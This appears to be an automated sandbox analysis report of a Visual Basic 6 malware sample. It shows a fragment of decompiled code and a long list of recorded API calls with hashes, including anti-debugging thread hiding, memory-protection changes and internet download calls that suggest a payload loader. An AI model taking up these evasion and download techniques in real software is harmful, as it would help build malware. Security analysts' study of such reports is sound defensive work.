            				 *[fs:0x0] = _t30;
            				_push(0x6c);
            				L00401190();
            				_v16 = _t30;
            				_v12 = 0x401128;
            				 *_a24 =  *_a24 & 0x00000000;
            				_v48 =  *0x401120;
            				_v56 = 5;
            				_push(0);
            				_push( &_v56);
            				_push( &_v72);
            				L00401232();
            				_v112 = 1;
            				_v120 = 0x8002;
            				_push( &_v72);
            				_t21 =  &_v120;
            				_push(_t21);
            				L004012A4();
            				_v124 = _t21;
            				_push( &_v72);
            				_t23 =  &_v56;
            				_push(_t23);
            				_push(2);
            				L00401292();
            				asm("wait");
            				_push(0x40b957);
            				return _t23;
            			}















            0x0040b8a4
            0x0040b8a7
            0x0040b8b2
            0x0040b8b3
            0x0040b8ba
            0x0040b8bd
            0x0040b8c5
            0x0040b8c8
            0x0040b8d2
            0x0040b8db
            0x0040b8de
            0x0040b8e5
            0x0040b8ea
            0x0040b8ee
            0x0040b8ef
            0x0040b8f4
            0x0040b8fb
            0x0040b905
            0x0040b906
            0x0040b909
            0x0040b90a
            0x0040b90f
            0x0040b916
            0x0040b917
            0x0040b91a
            0x0040b91b
            0x0040b91d
            0x0040b925
            0x0040b926
            0x00000000

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B8BD
            • #714.MSVBVM60(?,00000005,00000000), ref: 0040B8EF
            • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B90A
            • __vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?), ref: 0040B91D
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$#714ChkstkFreeList
            • String ID:
            • API String ID: 1770595079-0
            • Opcode ID: 232b6c4612bd13ea03bccc44b9e68eeb1c0772cb3136cd2c495cfd6277c92cb0
            • Instruction ID: 994a1fd8c44cb928e3ce4c07970a7e44f1fb45deb84c65771f40f2052b9fc10a
            • Opcode Fuzzy Hash: 232b6c4612bd13ea03bccc44b9e68eeb1c0772cb3136cd2c495cfd6277c92cb0
            • Instruction Fuzzy Hash: 8B01EDB1C41208AADB01EFD5D946BDEBBBCEB08704F60856BF600BB191D77856148B59
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f3ee76803bddb974596df00f185030d1b22e6205412252664b4bcbbbc844b528
            • Instruction ID: 9e03016953a9d955fbc7f52bf6fd40e21ccb2d2a3cca0b3805f1d49f0079bd23
            • Opcode Fuzzy Hash: f3ee76803bddb974596df00f185030d1b22e6205412252664b4bcbbbc844b528
            • Instruction Fuzzy Hash: C8631C31D1065A8ECB10EF69C9846DDF7B1FF95310F15C69AE458AB221EB30AAC5CF81
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: D0~l
            • API String ID: 0-3839986925
            • Opcode ID: ebe2f0f28afbea664cbd039d8c8e505bb366c92fa28119b59ef05c67f9d1f162
            • Instruction ID: debf28315fefb8d770dcb4aa1bc3ae952ef32c67d9a944027b833f2b80f27d0c
            • Opcode Fuzzy Hash: ebe2f0f28afbea664cbd039d8c8e505bb366c92fa28119b59ef05c67f9d1f162
            • Instruction Fuzzy Hash: 7652BE30B042898FCB24DB75D954B6EBBF2AF89314F1684AAD505EB391DB34EC058792
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602716873.000000001D980000.00000040.00000001.sdmp, Offset: 1D980000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 53808b128b9b0ac671f1690c302b281fef1e58361a755e02b334f48ebfda6b72
            • Instruction ID: 3429cfb6a7272a12fcb883cfa82598b62832466a96b108d5187f957152e78620
            • Opcode Fuzzy Hash: 53808b128b9b0ac671f1690c302b281fef1e58361a755e02b334f48ebfda6b72
            • Instruction Fuzzy Hash: FCF16F34A00229CFDB05DFA5C984BADBBF1BF88704F15856CD409AF262DB75E945CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: \yl
            • API String ID: 0-1382344034
            • Opcode ID: 8bb95ff16904445b934dc2654d1499ed4ee24b33a284013e5f4dcfc62857c660
            • Instruction ID: 5d5f2cf9c0c51f9fb470d297034063e2484855774d614a497895b98635c9fe2b
            • Opcode Fuzzy Hash: 8bb95ff16904445b934dc2654d1499ed4ee24b33a284013e5f4dcfc62857c660
            • Instruction Fuzzy Hash: D502C674F042499FDB24CBA9C8947ADB7B2AF8A320F15842DE115EF684CB74EC41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 66891be6d87763c4319b8a63b789de497ab730280a0d3f0877215969a4661b09
            • Instruction ID: 113d99c5270ad2939f5bc0c2c0d01074c98886dff71cc152a51496b6a9890045
            • Opcode Fuzzy Hash: 66891be6d87763c4319b8a63b789de497ab730280a0d3f0877215969a4661b09
            • Instruction Fuzzy Hash: 2B51A371B002099FCF04EFB4C884AAEB7B5BF89344F148929E516DB391DF70E9448BA5
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: \yl
            • API String ID: 0-1382344034
            • Opcode ID: 9e7f04c36c0197ecc5835ff5687f9bedca10bdbf852d56ce04d88336b6198806
            • Instruction ID: d0ef52e8d86a03fc136929d42e56290f44ab4c9b01a2eb9d992c70890893efb4
            • Opcode Fuzzy Hash: 9e7f04c36c0197ecc5835ff5687f9bedca10bdbf852d56ce04d88336b6198806
            • Instruction Fuzzy Hash: E9E1B674E002499FDB24DBA9C494BADB7B2EF89320F15842DE115EB684CB74FC41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 236ff1949ec7c2eef685102e95ff76afde1ccfe5f6fb99e85e38c0e103111d57
            • Instruction ID: ae23a8bfb80196aafae4dbeb4798400749d74a0edf243b7a0fc1e8fdcceb9ff0
            • Opcode Fuzzy Hash: 236ff1949ec7c2eef685102e95ff76afde1ccfe5f6fb99e85e38c0e103111d57
            • Instruction Fuzzy Hash: 4A4116F0608A09CEFF2B5929CAB63F526DAAF4135CF54462ACD43878DDE32684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction ID: 756b8bc33d1c3b2108b07c2e6b751128ed793d6baec9cb516cd7fa1fddca8eec
            • Opcode Fuzzy Hash: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction Fuzzy Hash: F73107F0608A09CEFF2B5A19C9763F422D5AF4135CF55462ACD03878DDD33684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction ID: 1205893239c3bf960e59daab77ff25d0b56945d8d33e06b3785bf1d8de08e1c6
            • Opcode Fuzzy Hash: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction Fuzzy Hash: 9C31E7F0608A09CEFF1B5A19C9B63B432D5AF5132CF55426ACD03874DDD33588E4C651
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction ID: 673cede5711cbee2cf19731da5ce5f2fac0420f9ed843291e77b9033089a15df
            • Opcode Fuzzy Hash: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction Fuzzy Hash: E73125E0608A09CEFF2B5A19C9B63B436D9AF4136CF55422ACD03878DDD33284E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction ID: 682345a1f656a047dc9f86a6997634b8c001c8c0581d29b6219997754fb4ebc4
            • Opcode Fuzzy Hash: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction Fuzzy Hash: 7831F3E0608A09CEFF2B5A19C9B63B936D5AF4136CF54426ACD03874DDD33688E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction ID: 363a96ce85fb1b7846917c6752a90950c9bcea674e1a4d3d7f401875069b71d3
            • Opcode Fuzzy Hash: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction Fuzzy Hash: BA31E6F0608A09CEFF2B5A19C9B63B936D5AF4136CF54526ACD07874DDD33688E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction ID: 26ffd41d0cc65f137de085be001f348e366076c2b00c1d8a51d319c0279c1de2
            • Opcode Fuzzy Hash: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction Fuzzy Hash: C721D6F0608A09CEFF2B5A19C9B63B936D6AF4132CF54426ADD07874DDD33684E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction ID: 9f8e7867c20d9e67e6b6728d508dd4e8184b19d1e5861728a9de9316a8c907e3
            • Opcode Fuzzy Hash: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction Fuzzy Hash: 9721D3F0608A09CEFF2B9A19C9B63B536D6AF4132CF94426ADD06874DDD33688E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction ID: 01fabe7aac44af0f822e10a5c4b83a18ddab25ad6cbf77074ce3a9531b6266f0
            • Opcode Fuzzy Hash: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction Fuzzy Hash: AA21F7F0608A09CEFF2B8A19C9B63B536D6EF4132CF54426ADD06874DDD33688E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 0a019983aa1f2aaeec683af853ba952bfda32bbd1f583513157bc1de682b9b93
            • Instruction ID: 213026cf150addaa6c23b420d052d511b8841a44a0338e961711ab909add7915
            • Opcode Fuzzy Hash: 0a019983aa1f2aaeec683af853ba952bfda32bbd1f583513157bc1de682b9b93
            • Instruction Fuzzy Hash: 3C21F8F0608E09CEFF278A29C9B63A536D6EF5132CF94426ACD06874DDD33684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction ID: 806829435a15c52982ca22dcf4a4e72317767e1858113f29dde2fe612f4a5c58
            • Opcode Fuzzy Hash: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction Fuzzy Hash: EA21D4A0608B09CDFB278A19C6B63B436D6AF5132CF94426ACD06874EDD33684E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction ID: e2e1df15058cc53f8e6f725f40f1f735ac612133ff42d3c90eecaf958f6284f7
            • Opcode Fuzzy Hash: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction Fuzzy Hash: 702108B0608B09CDFF278A18C5B63A436D5EF5136CF54426ACD02874EDD33184E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction ID: 9507adb35eac37d56d91a453d744bb711ce4143e47d6aa1ff7cd857e5ed609de
            • Opcode Fuzzy Hash: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction Fuzzy Hash: D321E9B0608B09CDFF278A18C9BA3A436D6EF4132DF94566BCD12874DDD33284E4C682
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction ID: f9993988272ad5ee7981dea95021159c1edcd01f1b06d48a10e48c2915de60eb
            • Opcode Fuzzy Hash: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction Fuzzy Hash: A711EE70608B09CDFF274E18C9AA36476D5EF4133DF94566ADD15870EDD33284E4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction ID: f323cbc4ff18c2577c7201082bd7a37fcdb26655c059b6b73156ec2283a6b0c7
            • Opcode Fuzzy Hash: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction Fuzzy Hash: EA110BB0608B09CEFF278A18C5BA36432D1EF4133DF944266CD12860DDD33188E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction ID: ecee6044b1d2f741961c2ff616c442f4a625d90c96818152983c13744953b34c
            • Opcode Fuzzy Hash: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction Fuzzy Hash: 4111CC70A08B09CDFF279A18C5AA36476D5EF5132DF98566ACD11870EDD33688D4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction ID: 83aa593b6c2b645a4a74e302651a74b1ce7959711058767949fbdba83852ebf2
            • Opcode Fuzzy Hash: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction Fuzzy Hash: 07112D70A08B05CDFF2B8B18C5AA3A477E1AF4132DF89416BCD01870EEC33284D4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction ID: 0e37965fdb6c51e8c556e30b6a155ae33bec0c94a364b2a335948e1a0913ed43
            • Opcode Fuzzy Hash: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction Fuzzy Hash: EBE09260704503CDFB2EEA28C1A66A836A3EE907087D84055CA024685CD23204D5C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01305FBC,00000040,01302493,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013063DA
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: MemoryProtectVirtual
            • String ID:
            • API String ID: 2706961497-0
            • Opcode ID: 658cf49023934f887b4d97786d7184f0eff78d941967bf593943438e12138f42
            • Instruction ID: f41e4f1abd396bb3c9c41c272a2a997ecf953f4d9cecf306bb95360e10c9f662
            • Opcode Fuzzy Hash: 658cf49023934f887b4d97786d7184f0eff78d941967bf593943438e12138f42
            • Instruction Fuzzy Hash: 6DC012E02240006E68048A68CD58D2BB2AA86D8A28B90C32CB832222CCC930EC048632
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 727e4e99f4af7cbc0e0be8cbb59e30e525d627808b3ff8b300c1e54ea899bedb
            • Instruction ID: 6368ebeee24bc1edefe0e6ea43debe1338a01f914d02d091b3ce59008c80cfb0
            • Opcode Fuzzy Hash: 727e4e99f4af7cbc0e0be8cbb59e30e525d627808b3ff8b300c1e54ea899bedb
            • Instruction Fuzzy Hash: DDC2BB34B042188FDB24EB75C8547AEB7F2AF8A344F1084A9D50AEB391DF319D46CB56
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6672220588c43c23fa40a858380526be376542e952881b5d3b96a4100ddc160b
            • Instruction ID: 16871f9c5186c80f9cc3ec324c1f02fcd7c64d93d3e29ef3d0fc9f687afdd11c
            • Opcode Fuzzy Hash: 6672220588c43c23fa40a858380526be376542e952881b5d3b96a4100ddc160b
            • Instruction Fuzzy Hash: 1A52D13190D3C08FD722CBBA86942D97F96EF5B318F2C58D9C1826F1A3DA609987D741
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0dec3c02d46e483008709af06d1f47038a1ed64d499aa58848c3c02ad53035d0
            • Instruction ID: cd1a11218cc7549f856f4ba44f660ec39ebfcc7811a3f63514aedead0a0898c0
            • Opcode Fuzzy Hash: 0dec3c02d46e483008709af06d1f47038a1ed64d499aa58848c3c02ad53035d0
            • Instruction Fuzzy Hash: 14D1EE30B042055FDB14DB74C895B6EB6E6AFCA304F15842CD61AAF390DF71EC428B96
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a7885a022d413043f0da650beb5fba516824a0494350501c6724ba5baebdc2ac
            • Instruction ID: c43db9062d0802401c15eeb9b032b255877623cbde6e5f555eec839319a69c16
            • Opcode Fuzzy Hash: a7885a022d413043f0da650beb5fba516824a0494350501c6724ba5baebdc2ac
            • Instruction Fuzzy Hash: 9A12C3F04057668BE310CF65C9C8BA63BB9B745798F534308D2632B6E2D7B9118ADF48
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cc7f5a3203d1c72e4eb0a0637287d0f2c1d229d16972750b580cd990e57c08fe
            • Instruction ID: 97888b5cd43ce2778bd365e6fe562e23d80ffd8db4ec7606522dce421e1a9e64
            • Opcode Fuzzy Hash: cc7f5a3203d1c72e4eb0a0637287d0f2c1d229d16972750b580cd990e57c08fe
            • Instruction Fuzzy Hash: 33C12BB08117658BD710CF64C9C87AA7BB9FB85798F134309D2632B2D2D7B9148ACF58
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f812c5ac32653759f35f248190e914ac932257a9119181bab18dea1db371a79e
            • Instruction ID: a454b26c5d324601c4702874161b61339b8ceb2bd831e96c783bc5e5a8343776
            • Opcode Fuzzy Hash: f812c5ac32653759f35f248190e914ac932257a9119181bab18dea1db371a79e
            • Instruction Fuzzy Hash: 8DB10AB08057658FD710CF64C9C8BAA3BB9BB85798F134309D1632B2D2D7B9148ACF44
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 1DB169A0
            • GetCurrentThread.KERNEL32 ref: 1DB169DD
            • GetCurrentProcess.KERNEL32 ref: 1DB16A1A
            • GetCurrentThreadId.KERNEL32 ref: 1DB16A73
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 7f3b7facd78f11320e9513abfe3a59dea3cb0c04ca44459867983a110d19be8a
            • Instruction ID: 5e510eb6922cbdd164770a8a0d3c21e0ec8dda1d80604d583291c1b7388c0124
            • Opcode Fuzzy Hash: 7f3b7facd78f11320e9513abfe3a59dea3cb0c04ca44459867983a110d19be8a
            • Instruction Fuzzy Hash: 8E5167B49047898FDB00CFA9D5887EEBFF0AF89314F24855DE05AAB390C7755844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 1DB169A0
            • GetCurrentThread.KERNEL32 ref: 1DB169DD
            • GetCurrentProcess.KERNEL32 ref: 1DB16A1A
            • GetCurrentThreadId.KERNEL32 ref: 1DB16A73
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: b1bf54945ce81d0bd905ff13324876cb4982ae9e6c614594ebc9a2a267bc6623
            • Instruction ID: 711c887d1556deb250e1aede505730fcd3cc2f169d3dc9b38806671f446420e3
            • Opcode Fuzzy Hash: b1bf54945ce81d0bd905ff13324876cb4982ae9e6c614594ebc9a2a267bc6623
            • Instruction Fuzzy Hash: 7D5143B49002498FDB00CFAAD588BAEBBF1EF8C314F208559E55AAB350D7756844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenA.WININET(01303F73,00000000,00000000,00000000,00000000), ref: 0130371B
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
            • Opcode ID: f1427dfd08f776f39db8984e73365d992de838e15c534a798d2fdd085fe8db45
            • Instruction ID: 9ea5cc9fa2f9aab2f0eaa972cd3319aaac562126b634777dd23c73d3c45e5f62
            • Opcode Fuzzy Hash: f1427dfd08f776f39db8984e73365d992de838e15c534a798d2fdd085fe8db45
            • Instruction Fuzzy Hash: 3A410E3424438BAFEF325E68CC76FEA36EAAF507A4F844119ED4A568C4E7718584C611
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
            • Opcode ID: b7bd64ecbe67885d94dcb445f1124e0185cde710ab4bf9b5ae892f408638e3ba
            • Instruction ID: fcd4a041a6b2a2faca4cecc478969e2490fe4691b89a571d918c86cea6c5fe1f
            • Opcode Fuzzy Hash: b7bd64ecbe67885d94dcb445f1124e0185cde710ab4bf9b5ae892f408638e3ba
            • Instruction Fuzzy Hash: C0310D3424438BAFEF325D58CC76BEA37EEAF01394F854015DD89968C1E7368584C611
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
